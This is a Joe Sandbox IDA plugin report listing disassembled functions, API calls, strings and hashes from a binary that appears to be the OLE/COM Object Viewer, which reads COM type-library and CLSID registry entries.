String ID: AccessPermission$CSecurityDescriptor::Initialize failed.$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
API String ID: 3894545846-3913380516
Opcode ID: 501472fbb4061f8f20110003cb2b0f4f21eed1180082447d04787c3c9122a527
Instruction ID: 6e7d98b338f02d5fe7f50b0351b74325b6cc60c61ff01257c7e0c2c2733d5246
Opcode Fuzzy Hash: 501472fbb4061f8f20110003cb2b0f4f21eed1180082447d04787c3c9122a527
Instruction Fuzzy Hash: 20517571940329ABDB21EF60EC8AFEE7B75EF65700F0044A8B505AA291CB745E85CF70

Function 00D32FE0 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 275registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C

Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4

Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C

CLSIDFromString.OLE32(00000000,?,00000100), ref: 00D3312B
wcstok.MSVCRT ref: 00D33191
wcstol.MSVCRT ref: 00D3319A
wcstok.MSVCRT ref: 00D331BA
wcstol.MSVCRT ref: 00D331C3
#1662.MFC42U(Version,00D221A0,?,00000100,00000100), ref: 00D331DE
GetUserDefaultLCID.KERNEL32(Version,00D221A0,?,00000100,00000100), ref: 00D331E3
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D3320F
GetSystemDefaultLCID.KERNEL32 ref: 00D33227
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D3326D
RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00D3329A
StringFromGUID2.OLE32(?,?,00000027), ref: 00D332B5
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D332CC
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D332EA
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D33330
RegCloseKey.ADVAPI32(?,?,?), ref: 00D33342
RegCloseKey.ADVAPI32(?), ref: 00D3334E
RegCloseKey.ADVAPI32(?), ref: 00D3335A
wsprintfW.USER32 ref: 00D33395
#2644.MFC42U ref: 00D333A4
#538.MFC42U(?), ref: 00D333B6
#800.MFC42U(?,00000000,?), ref: 00D333DB
#2644.MFC42U ref: 00D333E8

Part of subcall function 00D31C95: __EH_prolog3_GS.LIBCMT ref: 00D31C9F
Part of subcall function 00D31C95: StringFromGUID2.OLE32(?,?,00000028,000002BC,00D34FBE,00000000,00D29ECC,?), ref: 00D31CCE
Part of subcall function 00D31C95: wsprintfW.USER32 ref: 00D31CE4
Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D1A
Part of subcall function 00D31C95: lstrcpyW.KERNEL32(?,<no name>), ref: 00D31D30
Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D9E
Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00D31DEE
Part of subcall function 00D31C95: CLSIDFromString.OLE32(?,?), ref: 00D31E06

Strings

Version, xrefs: 00D33161
LoadRegTypeLib(%u, %u, %lu, &u ...) failed., xrefs: 00D33389
TypeLib, xrefs: 00D330DE, 00D33290

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: FromString$CloseLoadOpenQueryTypeValue$#2644DefaultMessageSendwcstokwcstolwsprintf$#1662#2859#538#800FocusH_prolog3_SystemUserlstrcpy
String ID: LoadRegTypeLib(%u, %u, %lu, &u ...) failed.$TypeLib$Version
API String ID: 672647845-2616143947
Opcode ID: caeb5d3964a41378b79ea0fa7259f5ed6fab2358e0f344a8a1c15bbf2083e18c
Instruction ID: 803c625c5e44a22d405e07aead33fb59f07edadb53258319312bd40265f9a450
Opcode Fuzzy Hash: caeb5d3964a41378b79ea0fa7259f5ed6fab2358e0f344a8a1c15bbf2083e18c
Instruction Fuzzy Hash: 75C118719042289FDF20AF60DD49BA9B7BAFF95314F0441E9A509E7250DB725EA48F20

Function 00D34B81 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 277registryCOMMON

Download Yara Rule

APIs

#1662.MFC42U(23685920), ref: 00D34CA5
GetUserDefaultLCID.KERNEL32(23685920), ref: 00D34CAA
LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00D34CDA
GetSystemDefaultLCID.KERNEL32 ref: 00D34CF2
LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00D34D3C
RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00D34D69
StringFromGUID2.OLE32(-00000008,?,00000027), ref: 00D34D84
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D34D9B
memset.MSVCRT ref: 00D34DB7
wnsprintfW.SHLWAPI ref: 00D34DE0
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D34DFD

Strings

LoadRegTypeLib(%s, %u, %u, %lu, ...) failed., xrefs: 00D34F2D
%u.%u, xrefs: 00D34DCF
TypeLib, xrefs: 00D34D5F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Open$DefaultLoadType$#1662FromStringSystemUsermemsetwnsprintf
String ID: %u.%u$LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.$TypeLib
API String ID: 2064963674-2378697407
Opcode ID: b82c542a2b4db2d93fbd6a5a6c2248f289e3981eee9389bea3c0b9a6a60dba15
Instruction ID: c44fd9614b51e225faad75f78c1dd15b84603e0b384b470c5d2592fb76626149
Opcode Fuzzy Hash: b82c542a2b4db2d93fbd6a5a6c2248f289e3981eee9389bea3c0b9a6a60dba15
Instruction Fuzzy Hash: 36C106B19002289FDB60DF64DC85BA9B7B8FF05305F0040A5BA49E7251E735AE84DF38

Function 00D31C95 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 216registrycomstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D31C9F
StringFromGUID2.OLE32(?,?,00000028,000002BC,00D34FBE,00000000,00D29ECC,?), ref: 00D31CCE
wsprintfW.USER32 ref: 00D31CE4
RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D1A
lstrcpyW.KERNEL32(?,<no name>), ref: 00D31D30
RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D9E
RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00D31DEE
CLSIDFromString.OLE32(?,?), ref: 00D31E06
#540.MFC42U ref: 00D31E18
#2810.MFC42U(?,Could not convert the CLSID of the %s interface viewer.,?), ref: 00D31E33
#800.MFC42U(?,00000000), ref: 00D31E4E
#540.MFC42U ref: 00D31E90
#2859.MFC42U(?,00000001), ref: 00D31EB6
#800.MFC42U(00000000,?,00000001), ref: 00D31ED3
CoCreateInstance.OLE32(?,00000000,00000001,00D21990,?), ref: 00D31EEE
#2810.MFC42U(?,The %s interface viewer failed to load.,?), ref: 00D31F91

Strings

Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID, xrefs: 00D31DAC
The %s interface viewer failed to load., xrefs: 00D31F8B
Interface\%s\OLEViewerIViewerCLSID, xrefs: 00D31D57
<no name>, xrefs: 00D31D24
Interface\%s, xrefs: 00D31CDE
Could not convert the CLSID of the %s interface viewer., xrefs: 00D31E2D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: QueryValue$#2810#540#800FromString$#2859CreateH_prolog3_Instancelstrcpywsprintf
String ID: <no name>$Could not convert the CLSID of the %s interface viewer.$Interface\%s$Interface\%s\OLEViewerIViewerCLSID$Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID$The %s interface viewer failed to load.
API String ID: 3373394939-4261977633
Opcode ID: dd57d3d82e7491957c34c7edc508888c6e41433b9336d8eb50527aed8a9e90fd
Instruction ID: e8b46eed2d34ebb8672c274794686731eaa941385193c20cccc9c43e070fa5a5
Opcode Fuzzy Hash: dd57d3d82e7491957c34c7edc508888c6e41433b9336d8eb50527aed8a9e90fd
Instruction Fuzzy Hash: DA81F9769002299FDB61DF50DC89BEEB7B9AF19300F4405A9F949E7250DB309E84CF60

Function 00D35010 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00D39137: CoFreeUnusedLibraries.OLE32(00D34689,00000000,?), ref: 00D391A2

#540.MFC42U(23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?,?,00000104), ref: 00D35050
CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3507D
CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3509D
#860.MFC42U(CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350B4
#1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350BC
#860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350CF
#1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350D7
#860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35118
#1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35120
#860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35136
#1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3513E
#860.MFC42U(IClassFactory::CreateInstance failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351A6
#1262.MFC42U(00000000,IClassFactory::CreateInstance failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351AE
#860.MFC42U(IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351C4
#1262.MFC42U(00000000,IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351CC
#800.MFC42U(?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35256

Strings

IClassFactory::CreateInstance failed., xrefs: 00D3519E
CoGetClassObject failed., xrefs: 00D350AC
IClassFactory::CreateInstance succeeded, but punk was NULL., xrefs: 00D351BC
CoGetClassObject succeeded, but punk was NULL., xrefs: 00D350C7
CoGetClassObject succeeded, but pClassFactory was NULL., xrefs: 00D3512E
QueryInterface on class factory for IClassFactory failed., xrefs: 00D35110

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1262#860$ClassObject$#540#800FreeLibrariesUnused
String ID: CoGetClassObject failed.$CoGetClassObject succeeded, but pClassFactory was NULL.$CoGetClassObject succeeded, but punk was NULL.$IClassFactory::CreateInstance failed.$IClassFactory::CreateInstance succeeded, but punk was NULL.$QueryInterface on class factory for IClassFactory failed.
API String ID: 3706085179-577247013
Opcode ID: b5e92e6719fac298f077fdbadcdbf66d563a51e9119cede6e93b114e5dac2009
Instruction ID: 32b93ab4a403e97538b30dfab0ddce600e97278dc542b584927d8c291717608f
Opcode Fuzzy Hash: b5e92e6719fac298f077fdbadcdbf66d563a51e9119cede6e93b114e5dac2009
Instruction Fuzzy Hash: C471AE75D01209EFCB10EFA8E98ABAEBBB4FF18315F104125E911B72A1D7759A44CB70

Function 00D2D000 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 167windowregistrystringCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D2D024
LoadCursorW.USER32(00000000,00007F02), ref: 00D2D030
SetCursor.USER32(00000000), ref: 00D2D037
SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2D06F
SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2D0A0
RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D2D0B3
RegEnumKeyW.ADVAPI32(?,00000000,?,00000100), ref: 00D2D0D0
wsprintfW.USER32 ref: 00D2D0F8
lstrcpyW.KERNEL32(?,00D22948,80000000,?,00D221A0,?,000001FE), ref: 00D2D13F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00D2D18E
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D2D1BE
SendMessageW.USER32(?,0000104C,00000000,00000001), ref: 00D2D1F3
LoadCursorW.USER32(00000000,00007F00), ref: 00D2D205
SetCursor.USER32(00000000), ref: 00D2D20C
SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00D2D23B
SendMessageW.USER32(?,0000104C,00000000,00000009), ref: 00D2D263
#5977.MFC42U ref: 00D2D26F
RegCloseKey.ADVAPI32(?), ref: 00D2D27A

Strings

CLSID\%s, xrefs: 00D2D0F2
Class Name, xrefs: 00D2D054
CLSID, xrefs: 00D2D08B, 00D2D0AD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$Cursor$Load$#4704#5977CloseEnumOpenlstrcpywsprintf
String ID: CLSID$CLSID\%s$Class Name
API String ID: 3330777091-3884686139
Opcode ID: fb49eb339f9ced750cc8005d000b6b26bbcf7ae52813db73cf903a743a1f0f95
Instruction ID: 0fb9234af64e4bc1e48dd0fcb9f2808b36dd1a1f4ea3656cdb94bf6ed0878db9
Opcode Fuzzy Hash: fb49eb339f9ced750cc8005d000b6b26bbcf7ae52813db73cf903a743a1f0f95
Instruction Fuzzy Hash: 706131B5900328AFEB209F60DC89FDA77BAFB45304F0045A5E619E2250D7765ED5CF60

Function 00D3CB3B Relevance: 36.2, APIs: 24, Instructions: 181COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00D3CB28,00000000,00000000,?), ref: 00D3CB71
GetLastError.KERNEL32(?,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB77
malloc.MSVCRT ref: 00D3CB9D
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000), ref: 00D3CBC1
GetLastError.KERNEL32(?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CBCB
free.MSVCRT ref: 00D3CD14
free.MSVCRT ref: 00D3CD20
free.MSVCRT ref: 00D3CD31

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: free$ErrorInformationLastToken$malloc
String ID:
API String ID: 3900411180-0
Opcode ID: 5123369bf25a7139441645983b8ae7820c928ababc03341aa43b9f7003e81a0e
Instruction ID: d4acbc1883b44e4259c5d03ff68f547d26fba8594ca85e5ece852668b028e580
Opcode Fuzzy Hash: 5123369bf25a7139441645983b8ae7820c928ababc03341aa43b9f7003e81a0e
Instruction Fuzzy Hash: 0F51A37A910226EBCB119FA4EC4876A7A74FF46351F269125FC01F7250DB348D409BB0

Function 00D30E70 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

#4493.MFC42U ref: 00D30E90
__EH_prolog3_GS.LIBCMT ref: 00D31B2B
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B35
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B41
#4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00D31B4F
#4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B59
#540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B61
#3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B77
#2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B8C
#2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B99
#3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BA6
#3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BB8
wsprintfW.USER32 ref: 00D31BE8
#5568.MFC42U(000000FF), ref: 00D31BF6
#6399.MFC42U(?,?,?,000000FF), ref: 00D31C09
#800.MFC42U(?,?,?,000000FF), ref: 00D31C11
#800.MFC42U(?,?,?,000000FF), ref: 00D31C19
#800.MFC42U(?,?,?,000000FF), ref: 00D31C21

Strings

,, xrefs: 00D31B70
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00D31BE2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #540#800$#3792#4155$#2910#2970#3865#4493#5568#6399H_prolog3_wsprintf
String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,
API String ID: 3591584436-2100854449
Opcode ID: 24ef7e6c7b7e7dd1df8258940a40084bf6c1b18bcfd61435b5d2b567ffbb60d6
Instruction ID: df15e9b585ac93a2280bf7e60eb2f931f8d3d8eaedf0b8410e46fc60a25e83d3
Opcode Fuzzy Hash: 24ef7e6c7b7e7dd1df8258940a40084bf6c1b18bcfd61435b5d2b567ffbb60d6
Instruction Fuzzy Hash: 5B310532900118AACF05EBA0DC52EEDBB76EF58300F444028F612B71E2DB756A1ADF71

Function 00D36C29 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 415registrystringCOMMON

Download Yara Rule

APIs

#540.MFC42U(?,?), ref: 00D36CF1
#2810.MFC42U(?,IMoniker::BindToObject failed on the file moniker created from ( "%s" ).,00000000,?,?), ref: 00D36D15
#800.MFC42U(?,00000000), ref: 00D36D39

Part of subcall function 00D35010: #540.MFC42U(23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?,?,00000104), ref: 00D35050
Part of subcall function 00D35010: CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3507D
Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350B4
Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350BC
Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350CF
Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350D7
Part of subcall function 00D35010: #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35118
Part of subcall function 00D35010: #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35120
Part of subcall function 00D35010: #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35136
Part of subcall function 00D35010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3513E

RegOpenKeyW.ADVAPI32(80000000,Interface,?), ref: 00D36E1F
malloc.MSVCRT ref: 00D36E77
malloc.MSVCRT ref: 00D36EBA
RegEnumKeyW.ADVAPI32(?,00000000,?,00000050), ref: 00D36F38
CLSIDFromString.OLE32(00000000,00000000), ref: 00D36F76
StringFromGUID2.OLE32(00000000,?,00000100), ref: 00D37148
lstrcpyW.KERNEL32(?,00000000), ref: 00D3717B
RegQueryValueW.ADVAPI32(?,?,?,00000200), ref: 00D371A6
wsprintfW.USER32 ref: 00D371D9
free.MSVCRT ref: 00D3733B
free.MSVCRT ref: 00D3734A
RegCloseKey.ADVAPI32(?), ref: 00D37389

Strings

IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00D36D09
', xrefs: 00D36DCF
Interface, xrefs: 00D36E15
%s <no name>, xrefs: 00D371CD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1262#860$#540FromStringfreemalloc$#2810#800ClassCloseEnumObjectOpenQueryValuelstrcpywsprintf
String ID: %s <no name>$'$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).$Interface
API String ID: 3715769521-149418688
Opcode ID: 33795c3e8f6832767a27be9c99bada5138a476b9a16acac7c90c8ac08b203e95
Instruction ID: 6d5f0dd5139c28a2082683c4d30788ce830e73c5f024d44f4ec6bfc903a8022c
Opcode Fuzzy Hash: 33795c3e8f6832767a27be9c99bada5138a476b9a16acac7c90c8ac08b203e95
Instruction Fuzzy Hash: D122F4B4905628DFDB64CF14CD84BA9B7B9FB44315F1040E9E60AA7292D7749EC4CF28

Function 00D342EB Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 280stringregistryCOMMON

Download Yara Rule

APIs

#1662.MFC42U(23685920), ref: 00D34326
#858.MFC42U(?), ref: 00D34531
#540.MFC42U ref: 00D3455F
StringFromGUID2.OLE32(?,?,00000028,?,00D29EDC), ref: 00D3459A
lstrcpyW.KERNEL32(?,00000000), ref: 00D345B1
#2810.MFC42U(?,CLSID\%s,?,?), ref: 00D345E0
lstrcpyW.KERNEL32(?,?), ref: 00D345F3
RegQueryValueW.ADVAPI32(80000000,00000000,?,00000100), ref: 00D34618
#2810.MFC42U(?,%s (%s),?,?), ref: 00D34636
#2810.MFC42U(?,00D2572C,?,?,00D29EDC), ref: 00D34651
#540.MFC42U(00000000,?), ref: 00D346F4
#2810.MFC42U(?,Could not add item to tree view. Internal OLEViewer error.,00000000,?), ref: 00D34709
#800.MFC42U(?,80004005,00000000,?), ref: 00D3472C
#2644.MFC42U(00000000,?), ref: 00D34737
#800.MFC42U(00000000,?), ref: 00D3476E

Strings

%s (%s), xrefs: 00D3462A
CLSID\%s, xrefs: 00D345D4
Could not add item to tree view. Internal OLEViewer error., xrefs: 00D346FD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2810$#540#800lstrcpy$#1662#2644#858FromQueryStringValue
String ID: %s (%s)$CLSID\%s$Could not add item to tree view. Internal OLEViewer error.
API String ID: 2368693756-676685266
Opcode ID: 34f1b2df019cf293356fb3426f0083bc1320c2c0d35436042e4765b80a54b777
Instruction ID: aca0976eb7ef4c2dab7892d27017338e07f198fc73180005f643ef0e33933afe
Opcode Fuzzy Hash: 34f1b2df019cf293356fb3426f0083bc1320c2c0d35436042e4765b80a54b777
Instruction Fuzzy Hash: C6D1E4759012299FDB60EF54DC99B9DB7B9FF18314F1040EAE409A72A1DB70AE84CF60

Function 00D2CB16 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 126stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2CB20
#540.MFC42U(00000264,00D2DF79), ref: 00D2CB33
StringFromGUID2.OLE32(?,?,00000028,00000264,00D2DF79), ref: 00D2CB5F
#861.MFC42U(?), ref: 00D2CBEC
lstrcmpW.KERNEL32(?,Interactive User,?,?,?,?), ref: 00D2CC3D
#6195.MFC42U(00D221A0,?,?,?,?), ref: 00D2CC4E
#2634.MFC42U(00000000,00D221A0,?,?,?,?), ref: 00D2CC58
#6195.MFC42U(?,?,?,?,?), ref: 00D2CC69
#2634.MFC42U(00000001,?,?,?,?,?), ref: 00D2CC72
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2CCA3
#6330.MFC42U(00000000,?,?,?,?), ref: 00D2CCAC
#800.MFC42U(00000000,?,?,?,?), ref: 00D2CCB7

Strings

RunAs, xrefs: 00D2CC0F
RemoteServerName, xrefs: 00D2CBBE
Interactive User, xrefs: 00D2CC31
ActivateAtStorage, xrefs: 00D2CB7D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634#6195$#540#6330#800#861FromH_prolog3_MessageSendStringlstrcmp
String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
API String ID: 3025489585-4117267133
Opcode ID: 86ce976b8d3388a8a91f437fb59021873691659db0a02c78a5eb6a56a8efe5c9
